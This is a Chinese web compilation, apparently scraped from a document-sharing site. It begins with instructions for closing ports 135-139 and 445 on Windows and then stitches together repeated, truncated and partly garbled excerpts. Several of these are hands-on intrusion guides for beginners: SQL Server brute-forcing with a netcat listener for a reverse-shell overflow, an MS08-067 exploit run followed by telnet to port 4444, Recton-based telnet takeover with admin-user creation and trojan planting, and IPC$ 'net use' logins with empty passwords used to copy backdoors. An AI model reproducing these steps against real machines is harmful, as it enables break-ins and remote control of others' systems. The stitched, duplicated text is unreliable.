Win7如何简单的关闭445端口及445端口入侵详解

最近永恒之蓝病毒攻击了很多教育网的同学，然后我就搜集了如何关闭445端口的方法，下面分享出来一起学习。

先了解一下445端口：

445端口是net File System(CIFS)（公共Internet文件系统），445端口是一个毁誉参半的端口，他和139端口一起

是IPC$入侵的主要通道。有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机，但也正是因为有了它，

黑客们才有了可乘之机，他们能通过该端口偷偷共享你的硬盘，甚至会在悄无声息中将你的硬盘格式化掉！我们所能

做的就是想办法不让黑客有机可乘，封堵住445端口漏洞。

主要有三种方法，第一种通过防火墙比较简单；第二种通过注册表也很简单；第三种稍微复杂一点通过修改ip安全

策略，所以这里没有写出来，前两种就够用了。但第一种我用的时候没有效果，为了方便大家可以直接用第二种方法。

方法一：

通过防火墙可以直接关闭的，很简单，在控制面板的“Windows 防火墙”页面左侧找到“高级设置”打开。

在“高级安全 windows 防火墙”页面左侧找到“入站规则”右键点击“新建规则”。

选择“端口”。点击下一步。

这里要关闭什么端口就输入到“特定本地端口”一次关一个，方法都是一样的。然后点击“下一步”。

端口135,139,445属于TCP

端口137,138属于UDP

选择“阻止链接”。点击“下一步”。

留下“公用”即可（这里为了安全我也选了专用）。

名称和描述自己就随便起了,已经完成了

这么简单的方法用了之后好像不太管用，查看命令行445端口仍然处于listing 状态？？？（为什么这样我也不知道）

然后又用了第二种网上流行的修改注册表的方法，也很简单。

方法二

1、运行regedit打开注册表

2、依次依次点击注册表选项”

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters “，进入NetBT这个

服务的相关注册表项。

3、在右边空白处右击新建“QWORD（64位）值”，然后重命名为“SMBDeviceEnabled”，再把这个子键的值改为0。

4、之后win7还要在service中设置

依次点击“开始”，“运行”，输入services.msc，进入服务管理控制台。然后，找到server服务，双击进入管理控制页面。把这个

服务的启动类型更改为“禁用”，服务状态更改为“停止”，最后点击应用即可。

现在就已经关闭了445端口。

重启后，我们来检查445是否已经关闭

cmd命令行中输入“netstat -an”查看端口状态，但如果直接输入会无法识别netstat命令。所以要“cd c:/windows/system32/”切换，然后再执行

上述命令，发现445端口已经不存在了，就是已经关闭了。

常用端口号大全

常用端口号大全（详细） [ 2007-7-23 22:42:00 | By: 梦精灵] ?21/tcp FTP 文件传输协议 ?22/tcp SSH 安全登录、文件传送(SCP)和端口重定向 ?23/tcp Telnet 不安全的文本传送 ?25/tcp SMTP Simple Mail Transfer Protocol (E-mail) ?69/udp TFTP Trivial File Transfer Protocol ?79/tcp finger Finger ?80/tcp HTTP 超文本传送协议(WWW) ?88/tcp Kerberos Authenticating agent ?110/tcp POP3 Post Office Protocol (E-mail) ?113/tcp ident old identification server system ?119/tcp NNTP used for usenet newsgroups ?220/tcp IMAP3 ?443/tcp HTTPS used for securely transferring web pages 端口：0 服务：Reserved 说明：通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口，当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描，使用IP地址为0.0.0.0，设置ACK位并在以太网层广播。端口：1 服务：tcpmux 说明：这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者，默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户，如：IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在I NTERNET上搜索tcpmux并利用这些帐户。端口：7 服务：Echo 说明：能看到许多人搜索Fraggle放大器时，发送到X.X.X.0和X.X.X.255的信息。端口：19 服务：Character Generator 说明：这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HAC KER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。

各个端口的入侵方法(入侵菜鸟必看)

各个端口的入侵方法（入侵菜鸟必看）1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破（字典是关键）最后SQLTools.exe入侵对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口（以上反向的，测试成功） sqlhelloz.exe 入侵ip 1433 （这个是正向连接） 2. 4899端口入侵用4899过滤器.exe，扫描空口令的机器 3. 3899的入侵对很早的机器，可以试试3389的溢出(win3389ex.exe) 对2000的机器，可以试试字典暴破。(tscrack.exe) 4. 80入侵对sp3以前的机器，可以用webdav入侵；对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe）可以利用SQL进行注入。（小榕的注入软件）。 5. serv-u入侵(21端口）对5. 004及以下系统，可用溢出入侵。（serv5004.exe）对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe）

====================================== 对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs）输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码。如：cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 6. 554端口用real554.exe入侵。 7. 6129端口用DameWare6129.exe入侵。 8. 系统漏洞利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，进行溢出入侵。 9. 3127等端口可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。 10. 其他入侵利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。各种端口的入侵方法1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPas*.**e 进行字典暴破（字典是关键）最后SQLTool*.**e入侵对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。

计算机端口详解与常见端口入侵方法

计算机“端口”是英文port的义译，可以认为是计算机与外界通讯交流的出口。其中硬件领域的端口又称接口，如：USB端口、串行端口等。软件领域的端口一般指网络中面向连接服务和无连接服务的通信协议端口，是一种抽象的软件结构，包括一些数据结构和I/O（基本输入输出）缓冲区。可以先了解面向连接和无连接协议（Connection－Oriented and Connectionless Protocols）面向连接服务的主要特点有：面向连接服务要经过三个阶段：数据传数前，先建立连接，连接建立后再传输数据，数据传送完后，释放连接。面向连接服务，可确保数据传送的次序和传输的可靠性https://www.360docs.net/doc/948926301.html,无连接服务的特点是：无连接服务只有传输数据阶段。消除了除数据通信外的其它开销。只要发送实体是活跃的，无须接收实体也是活跃的。它的优点是灵活方便、迅速，特别适合于传送少量零星的报文，但无连接服务不能防止报文的丢失、重复或失序。区分“面向连接服务”和“无连接服务”的概念，特别简单、形象的例子是：打电话和写信。两个人如果要通电话，必须先建立连接——拨号，等待应答后才能相互传递信息，最后还要释放连接——挂电话。写信就没有那么复杂了，地址姓名填好以后直接往邮筒一扔，收信人就能收到。TCP/IP协议在网络层是无连接的（数据包只管往网上发，如何传输和到达以及是否到达由网络设备来管理）。而“端口”，是传输层的内容，是面向连接的。协议里面低于1024的端口都有确切的定义，它们对应着因特网上常见的一些服务。这些常见的服务可以划分为使用TCP端口（面向连接如打电话）和使用UDP端口（无连接如写信）两种。网络中可以被命名和寻址的通信端口是操作系统的一种可分配资源。由网络OSI（开放系统互联参考模型，Open System Interconnection Reference Model）七层协议可知，传输层与网络层最大的区别是传输层提供进程通信能力，网络通信的最终地址不仅包括主机地址，还包括可描述进程的某种标识。所以TCP/IP协议提出的协议端口，可以认为是网络通信进程的一种标识符https://www.360docs.net/doc/948926301.html, 应用程序（调入内存运行后一般称为：进程）通过系统调用与某端口建立连接（binding，绑定）后，传输层传给该端口的数据都被相应的进程所接收，相应进程发给传输层的数据都从该端口输出。在TCP/IP协议的实现中，端口操作类似于一般的I/O操作，进程获取一个端口，相当于获取本地唯一的I/O文件，可以用一般的读写方式访问https://www.360docs.net/doc/948926301.html, 类似于文件描述符，每个端口都拥有一个叫端口号的整数描述符，用来区别不同的端口。由于TCP/IP传输层的TCP和UDP两个协议是两个完全独立的软件模块，因此各自的端口号也相互独立。如TCP有一个255号端口，UDP也可以有一个255号端口，两者并不冲突https://www.360docs.net/doc/948926301.html, 端口号有两种基本分配方式：第一种叫全局分配这是一种集中分配方式，由一个公认权威的中央机构根据用户需要进行统一分配，并将结果公布于众，第二种是本地分配，又称动态连接，即进程需要访问传输层服务时，向本地操作系统提出申请，操作系统返回本地唯一的端口号，进程再通过合适的系统调用，将自己和该端口连接起来（binding，绑定）。TCP/IP 端口号的分配综合了以上两种方式，将端口号分为两部分，少量的作为保留端口，以全局方式分配给服务进程。每一个标准服务器都拥有一个全局公认的端口叫周知口，即使在不同的机器上，其端口号也相同。剩余的为自由端口，以本地方式进行分配。TCP和UDP规定，小于256的端口才能作为保留端口。按端口号可分为3大类：（1）公认端口（Well Known Ports）：从0到1023，它们紧密绑定（binding）于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如：80端口实际上总是HTTP通讯。（2）注册端口（Registered Ports）：从1024到49151。它们松散地绑定于一些服务。也

手动封闭137、138、139、445端口

手动封端口的操作： 1．闭137、138、139端口。右击-网上邻居-属性/本地连接-属性，在microsoft网络客户端前的小勾去掉。接着也把microsoft网络的文件和打印机共享的小勾也去掉。然后点击internet协议/(TCP/IP)--属性--高级--WINS--禁用TCP/IP上的 NETBIOS--确定。禁用lmhosts服务。

注意：对于多网卡设备为每一个网络连接都要进行同样设置。 2．关闭445端口关闭445端口的方法有很多，通常用修改注册表的方法： 1) 在命令行窗口运行修改注册表命令RegEdit。 2) 在弹出的注册表编辑窗口的左边找到下面目录 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters 你可以一级一级目录往下点击，也可用“查找”命令找到NetBT项，然后点击 Parameters项。

3) 在编辑窗口的右边空白处点击鼠标右键，出现的“新建”菜单中选择 “DWORD值”，如下图所示：修改注册表关闭不安全端口 4) 将新建的DWORD参数命名为“SMBDeviceEnabled”，数值为缺省的“0”。 5) 修改完后退出RegEdit，重启机器。 3．关闭135端口。禁用schedule服务，禁用MSDTC服务。 a)关闭135端口一、单击”开始“——”运行“，输入”dcomcnfg“，单击”确定“，打开组件服务。二、在弹出的”组件服务“对话框中，选择”计算机“选项。三、在”计算机“选项右边，右键单击”的电脑“，选择”属性“. 四、在出现的”的电脑属性“对话框”默认属性“选项卡中，去掉”在此计算机上启用分布式COM“前的勾。

常用入侵端口

常用入侵端口.txt为什么我们在讲故事的时候总要加上从前？开了一夏的花，终落得粉身碎骨，却还笑着说意义。端口：0 服务：Reserved 说明：通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口，当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描，使用IP地址为0.0.0.0，设置ACK位并在以太网层广播。端口：1 服务：tcpmux 说明：这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者，默认情况下tcpmux 在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户，如：IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。端口：7 服务：Echo 说明：能看到许多人搜索Fraggle放大器时，发送到X.X.X.0和X.X.X.255的信息。端口：19 服务：Character Generator 说明：这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS 攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包，受害者为了回应这些数据而过载。端口：21 服务：FTP 说明：FTP服务器所开放的端口，用于上传、下载。最常见的攻击者用于寻找打开anonymous 的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。端口：22 服务：Ssh 说明：PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点，如果配置成特定的模式，许多使用RSAREF库的版本就会有不少的漏洞存在。端口：23 服务：Telnet 说明：远程登录，入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术，入侵者也会找到密码。木马Tiny Telnet Server 就开放这个端口。端口：25 服务：SMTP

常用的端口入侵

21端口： 21端口是默认的FTP端口，利用方式：弱口令探测/溢出目前我还没看到远程溢出的，SERU的本地溢出漏洞风靡一时，曾经很多服务器就在沦丧于这个漏洞。 22端口 22端口是SSH远程登录协议，利用方式：弱口令探测 23端口 23端口是TLENET的默认端口，利用方式：弱口令探测/溢出一般大家用弱口令探测得比较多，但是成功率比较低，还是溢出来得快，毕竟权限高，想做什么都可以！ 25端口 25端口是SMTP协议的默认端口，邮件接收服务器。利用方式：溢出 53端口 53端口是DNS服务的默认端口，提供域名服务器，利用方式：溢出。这个今年很火，我试了一下，一晚上差不多可以溢出10W台开几抬肉鸡的话 79端口 79端口Finger服务的默认端口(查询远程主机在线用户等信息)，可以在辅助入侵中获取更多的主机信息。利用FINGER服务可以查询到主机很多敏感的信息，在入侵的时候常常可以起到意想不到的作用。

80端口 80端口是IIS的默认端口，全球信息网超文本传输协议(www)。利用方式：IIS溢出/SQL注入/旁注/跨站。不过一部分路由器的远程管理端口也是80。SQL注入大家已经很熟悉了吧，IIS溢出也只存在那些很老的机器上，看运气了。 110端口 110端口提供 Pop3 服务。邮件发送服务器。利用方式：溢出。 135端口 135端口提供查询服务。利用方式：IPC$(Internet Process Connection)入侵。网上教程非常多，不多说了。 137端口 137端口统共NetBIOS 数据报(UDP)服务。 139端口 139端口提供共享资源服务(NetBios-SSN)，用在IPC$入侵中。上面这三个端口可以综合利用。 161端口 161端口是远程管理设备(SNMP)的默认端口。这个很多小菜不知道怎么利用，那么重点来说说这个。 SNMP是简单网络管理协议，不清楚百度一下，很多小菜扫描出来了SNMP的弱口令，比如private,public等等，但是不知道怎么利用，这里介绍两款工具：IP NetWork browse 和LANguard NetWork Scnaner,这两个工具都可以扫描SNMP，而且可以扫描到，磁盘，服务，

135端口入侵的方法(简单)

135端口入侵的方法(简单) （1）通过135端口入侵，攻击者首先需要查找网络上存在135端口漏洞的主机地址，在查找此类主机过程中，可以使用一些扫描工具，比如SuperScan就是典型的端口工具之一。在SuperScan“开始”文本框中输入需要扫描的起始地址，然后在“结束”文本框里填写好扫描结束的IP地址，在“扫描类型”选项中选择“所有端口定义”单选按钮，并在右侧的文本框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后，在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径，把里面有漏洞的IP整理下即可。（2）得到有漏洞后，我们还有一个功能强大的扫描工具，比如NTSscn汉化版。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的IP路径，在连接共享$处选择“WMI扫描”，在“扫描打开端口的主机”处填写135端口。最后点击“开始”即可。要不了多久就会有结果显示。（3）获得漏洞主机用户名以后，我们需要一个开启的工具，那就是Recton v2.5。好了，万事具备之欠那“东风”拉。把刚刚扫描的IP输入TELNET界面的“远程主机”处，以及用户名和密码，不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车，会提示让你输入用户名，把用户名输入后，回车即可进入主机。而且得到的还是SYSTEM 权限。下一步就是为我们加了拥有管理员权限的用户，看看我杰作。最后我们可以上传一些远程性木马软件作为后门，比如灰鸽子，冰河等。在这里我就不在展示。我还是喜欢3389端口，那我就给他上传个开启3389的脚本，不过对于开启3389端口的工具网上还真的不少，比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的

常见端口对照表

常见端口对照表端口：0 服务：Reserved 说明：通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口，当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描，使用IP地址为0.0.0.0，设置ACK位并在以太网层广播。端口：1 服务：tcpmux 说明：这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者，默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户，如：IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。端口：7 服务：Echo 说明：能看到许多人搜索Fraggle放大器时，发送到X.X.X.0和X.X.X.255的信息。端口：19 服务：Character Generator 说明：这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP 连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP 的数据包，受害者为了回应这些数据而过载。端口：21 服务：FTP 说明：FTP服务器所开放的端口，用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP 服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash 和Blade Runner所开放的端口。端口：22 服务：Ssh 说明：PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点，如果配置成特定的模式，许多使用RSAREF库的版本就会有不少的漏洞存在。端口：23 服务：Telnet 说明：远程登录，入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术，入侵者也会找到密码。木马Tiny Telnet Server就开放这个端口。端口：25 服务：SMTP

黑客常用的几种入侵端口的方法

【托管服务qin】黑客常用的几种入侵端口的方法服务器托管, BGP, 光钎专线, 防火墙, 新一代IDC 工欲善其事，必先利其器，本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法，希望能对大家有所帮助，以助于大家能更好地防御黑客的攻击。" ^' D( E3 K! N) ^! c 1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破（字典是关键）7 L5 a9 T" E: C& x' k* C 最后SQLTools.exe入侵4 r+ F" q g9 j- K9 m* x4 o' E =============================2 z0 ~3 T) K5 n8 W; Z 对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口（以上反向的，测试成功）) Q) Q7 K+ L! J$ o6 Z9 w( a sqlhelloz.exe 入侵ip 1433 （这个是正向连接）% J3 L6 x8 y: t; p 2. 4899端口入侵9 `" f0 r# k2 ^: F 用4899过滤器。exe，扫描空口令的机器 3. 3899的入侵对很早的机器，可以试试3389的溢出（win3389ex.exe）对2000的机器，可以试试字典暴破。（tscrack.exe）* X8 }: O! |2 }& x7 M 4. 80入侵+ J9 [0 L4 _) B! K 对sp3以前的机器，可以用webdav入侵；

服务器135137138139445等端口解释和关闭方法

服务器135、137、138、139、445等端口解释和关闭方法在服务器中，3389端口的开放是必需的，因为任何服务器的管理员如果想很好地管理自己的服务器，都需要开启这种方便的网络管理服务。不过3389端口一旦开启，必然会引来无数黑客，即便那些黑客破解不了密码，也很可能占用你的连接请求数，使你无法登录自己的服务器。关闭服务器中的3389端口的方法很简单。在windows2000或2003中，进入控制面板，然后选择“管理工具”中的“服务”，在弹出的服务列表中，选中“Terminal Services”，将该服务的启动类型改为“手动”，然后停止这个服务就可关闭3389 端口了。在windows XP中被黑客悄悄开启远程协作的现象也不是没有发生过。可以右键点击“我的电脑”，进入“系统属性”窗口中的“远程”选项卡界面，取消对“远程桌面”和“远程协作”选择，再单击确定即可关闭3389端口。135端口：利用135端口的黑客想要得到管理员的宇航局码和口令，过程往往是很简单，他们似乎部有自己的方法和手段。关闭135端口，停止可能被黑客利用的RPC服务，不给他们任何能够利用系统弱点的机会。但单纯地将RPC服务停止会对某些网络用户造成不必要的麻烦。在网络中，只有使用微软DCOM技术的程序才会调

用RemoteProcedure Call，也就是135端口服务，所以在面临这个问题时，将DCOM服务停止是最好的方法。首先点击“开始”菜单，在“运行”里输入dcomcnfg.exe命令，在弹出的设置窗口中选择“默认设置”标签选项，然后点击选择此选项页面中的“在这台计算机上启用分布式COM”选项，最后点击确定完成。这样你就可以很好地保护你的电脑了，任何黑客都无法对你电脑中的DCOM服务和DCOM应用程序进行远程操作与访问，达到了既不关闭又能够停止135端口，让黑客放弃攻击你的目的。137、138端口：在关闭137和138端口之前，先介绍一下NetBIOS服务。很多人认为NetBIOS服务是一个网络协议，其实不然。NetBIOS只是网络基本的输入/输出系统，是一个应用于程序接口，用于数据源与目的地之间的数据交换。不过它所包含的端口及一些命名原则属于OSI(Open System Interconnection)模式的上三层，与低层的通讯协议是全然独立的。因此NetBIOS服务能够成功地建构于不同的通讯协议上，让它支持访问计算机应用程序和设备通信时所要用到各种服务。正是由于考虑到了NetBIOS服务这种基于TCP/IP 协议下的特点，而NetNBIOS又完全依靠137、138端口支撑，因此如果停止了NetBIOS，就能够将137和138端口的危险根除。停止NetBIOS方法很简单，鼠标右击桌面上的“网上邻居”图

电脑常用端口端口大全

电脑常用端口端口大全一、端口大全端口：0 服务：Reserved 说明：通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口，当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描，使用IP地址为0.0.0.0，设置ACK位并在以太网层广播。端口：1 服务：tcpmux 说明：这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者，默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户，如：IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX 等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。端口：7 服务：Echo 说明：能看到许多人搜索Fraggle放大器时，发送到X.X.X.0和X.X.X.255的信息。端口：19 服务：Character Generator 说明：这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER 利用IP欺骗可以发动dos攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle dos攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包，受害者为了回应这些数据而过载。端口：21 服务：ftp 说明：FTP服务器所开放的端口，用于上传、下载。最常见的攻击者用于寻找打开anonymous的ftp服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible ftp、webEx、WinCrash和Blade Runner所开放的端口。端口：22 服务：Ssh 说明：PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点，如果配置成特定的模式，许多使用RSAREF库的版本就会有不少的漏洞存在。端口：23 服务：TelNET 说明：远程登录，入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术，入侵者也会找到密码。木马Tiny TelNET Server就开放这个端口。端口：25 服务：SMTP 说明：SMTP服务器所开放的端口，用于发送邮件。入侵者寻找SMTP服务器是为

黑客MS08-067漏洞攻击全程演示(图解)

黑客MS08-067漏洞攻击全程演示（图解） MS08-067漏洞是Server 服务中的漏洞，该漏洞可能允许远程代码执行。下面我们来进行MS08-067漏洞远程溢出演示，让我们看看我们的机子是如何轻易的成为人家的肉鸡，被控制的 1.漏洞主机扫描。使用专业端口扫描工具扫描445端口。获取可溢出的主机列表。如下图： 2.MS08-067溢出工具进行主机溢出，格式ms08-067.exe ip 溢出成功标志： SMB Connect OK! Send Payload Over!

3.溢出成功后会开放4444端口，直接telnet登陆上去。 4.Ipconfig确认溢出成功。

5.添加用户确认获取系统权限

6.防范办法：针对该溢出，我们并不是没有办法，既然是要扫描445端口，然后telnet，我们只需如下的方法就可以解决：一、及时安装KB958644补丁二、关闭或屏蔽掉445端口。三、安装专业防火墙。《MS08-067》溢出：扫445端口, 溢出 Q:提示 SMB Connect OK! RpcExceptionCode() = 1722 这样溢出成功了么？ A:溢出失败，对方开启了防火墙。 Q:提示 Make SMB Connection error:1203 是怎么回事？

A:对方没有开机联网或者没有安装Microsoft 网络的文件和打印机共享协议或没有启动Server服务。 Q:提示 SMB Connect OK! Maybe Patched! 补丁已经打上了。不存在漏洞。 SMB Connect OK Maybe Patched! 这个说明对方已经打了补丁 SMB Connect OK! Send Payload Over! 溢出成功 ---------------------------------------------------- 在cmd下直接运行MS08-067.exe 出现命令帮助 MS08-067.exe 很简单，只需要输入MS08-067.exe IP 就可以了。 MS08-067 Exploit for CN by [ft=#ff0000,, 目标机为虚拟机（IP 192.168.1.2），攻击者为本机(IP 192.168.1.188) 虚拟机端口开放如下：输入命令： MS08-067.exe 192.168.1.2 提示： SMB Connect OK! Send Payload Over! 再次查看虚拟机的端口：我们看到当我们运行了MS08-067.exe 192.168.1.2 之后，虚拟机的端口出现了个4444 端口，状态为LISTENING ，这时就说明已经溢出成功了，接下来我们在本机运行 Telnet 192.168.1.2 4444 就可以了Telnet登陆到目标机了。

139端口入侵简易教程

139端口入侵简易教程; net use \\192.168.0.1\ipc$ "" /user:administrator 提到139端口，我想知道的人一定非常多，本来是不想用写这个教程的，但考虑要照顾到新人，所以还是简单的写一下。首先，连接的命令是： net<空格>use<空格>\\IP地址\ipc$<空格>密码<空格>/user:用户名假设我要连接的目标IP地址是：192.168.1.11，用户名是google,使用的密码是123456,那么连接对方139端口通道的格式就是这样的： net use \\192.168.1.11\ipc$ 123456 /user:google 如果连接成功，那么系统会提示"命令成功完成"! 空密码是这样的：如果密码是空的，那就在原先输入密码的地方以""代替。开始查看权限：查看登录后用户权限的方法很简单，只要给目标系统传个文件就可以了，如果传诵成功，那么一般都是系统管理员权限了，如果不成功可能就是来访者权限或者其他用户组的。命令的格式是这样的： copy<>文件绝对路径<>\\IP地址\文件目标路径比如我要将本地C盘下的a.exe文件拷贝到192.168.1.11的D盘下： copy c:\a.exe \\192.168.1.11\d$ 要注意"$"符，那是隐藏共享盘的表示符，如果对方的共享盘不是隐藏的，就不需要"$"符了。如果命令执行成功，系统同样会提示"已复制1 个文件" 小技巧：再次复制相同文件至相同路径，以检测是否存在杀毒软件！！！如果系统提示“改写\\192.168.1.11\d$\a.exe 吗? (Yes/No/All):”则说明文件在还在目标系统上，没有被杀毒软件查杀（一般发送过去的都是后门程序只类的东西，只有系统安装了杀毒软件都会被杀掉）。如果没有提示，则说明安装了杀毒软件。

xp如何关闭445端口方法

端口安全防范设置实例讲解关闭445端口方法端口的安全防范手法都差不多，这里以最常受到攻击的445攻击为例进行讲解。 445端口是一个毁誉参半的端口，有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机，但也正是因为有了它，黑客们才有了可乘之机，他们能通过该端口偷偷共享你的硬盘，甚至会在悄无声息中将你的硬盘格式化！我们所能做的就是想办法不让黑客有机可乘，封堵住445端口漏洞。简单起见，本文中都以Windows XP为例。 1.端口排除法这种方法利用Windows XP系统的端口排除功能将来自于445端口的所有信息包全部禁止掉，让入侵者无法接近你的主机，下面是这种方法的具体实现步骤： ①打开Windows XP系统的开始菜单，选中“设置”项下面的“网络连接”图标，并用鼠标右键单击之，从其后的快捷菜单中，单击“浏览”命令。 ②在弹出的窗口中右击“本地连接”图标，选中“属性”选项，弹出本地连接属性窗口；打开“常规”选项卡，将其中的“Internet协议(TCP/IP)”项选中，然后再单击“属性”按钮，打开Internet协议(TCP/IP)属性设置页面。 ③继续单击该页面中的“高级”按钮，打开高级TCP/IP设置窗口，选中其中的“选项”选项卡，并在该选项卡的“可选的设置”项中将“TCP/IP筛选”选中，再单击一下对应的“属性”按钮，打开设置窗口。由于445端口属于一种TCP端口，你可以在对应“TCP端口”的设置项处，将“只允许”项选中，激活下面的“添加”按钮，单击该按钮，在其后打开的“添加筛选器”窗口中，将必须用到的几个服务端口号码，都添加进来，而将用不到的445端口号码排除在外，设置完毕后，单击“确定”按钮，就可以让设置生效了。 2.服务关闭法考虑到文件夹或打印机共享服务才会利用到445端口，因此直接将文件夹或打印机共享服务停止掉，同样也能实现关闭445端口的目的，让黑客无法破坏各种共享资源，下面是关闭文件夹或打印机共享服务的具体步骤： ①打开Windows XP系统的开始菜单，选中“设置”项下面的“网络连接”图标，右击从其后的快捷菜单中单击“浏览”命令。 ②在接着出现的窗口中，右击“本地连接”图标，选中“属性”选项，弹出本地连接属性窗口；打开“常规”选项卡，并在“此连接使用下列项目”列表框中，将“Microsoft网络的文件或打印机共享”选项前面的勾号取消。最后单击“确定”按钮，重新启动系统，Internet 上的其他人就没有权利访问到各种共享资源了。当然，你也可以在不停止共享服务的条件下，剥夺其他人的共享访问权利；利用本地安全设置中的“用户权利指派”功能，指定Internet上的任何用户都无权访问本地主机，具体步骤为： ①在Windows XP系统的开始菜单中，依次单击“程序”→“管理工具”→“本地安全策略”选项，接着展开“本地策略”→“用户权利指派”文件夹，在对应的右边子窗口中选中“拒绝从网络访问这台电脑”选项，并用鼠标左键双击。

个人主机入侵网络攻击知道对方IP该怎么入侵

